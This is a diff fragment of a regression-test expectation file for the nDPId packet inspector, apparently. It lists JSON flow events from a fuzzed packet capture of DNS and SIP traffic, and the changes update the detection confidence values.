00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1120470456513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470456513,"pkt":"ADBUADRWAODtAW69CABFAABIa1sAAIARS\/bAqAECwKgDAQrjADU0NPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1120470457512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470457512,"pkt":"ADBUADRWAODtAW69CABFAABIa1wAAIARS\/XAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABFtzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1120470459516,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470459516,"pkt":"ADBUAjRWAODtAW69CABFAABIa10AAIARS\/TAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1120470461518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470461518,"pkt":"ADBUADRWAODtAW69CABFAABIa14AAFMRS\/PAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcAPDaXAJa3liZXJtaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -801,7 +801,7 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1120470473526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470473526,"pkt":"ADBUADRWAODtAW69CABFAABEa2AAAIARS\/XAqAECwKgBAQrkADUAMLnxaukAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470473527,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1120470473527,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470473527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAJXMAtz7AqAEBwKgBAgA1CuQAR5xtaumAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3Qw"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2157,"global_ts_msec":1120470473631} @@ -810,51 +810,51 @@ 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"AODtCW69ADBUADRWCABFACVzAABAADcRiifU8iEjwKgBAhPEE8QB8jJ0U0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc3IFJFR0lTVEVSDQpGcm9tOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zYTU4MTQxDQpUbzogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWI2ODMtMThlYzGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1120470474627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470474627,"pkt":"ADBUADRWAODtAW69CABFAABIa2MAAIARS+7AqAECwKgBAQrlADUANLH1d+oBgAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1120470476630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470476630,"pkt":"ADBUADRWAODtAW69CABFAABIa2QAAIARS+3AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrJXMAAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1120470478633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470478633,"pkt":"ADBUADRWAODtAW69CABFAABIa2UAAIARS+zAqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcJpzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 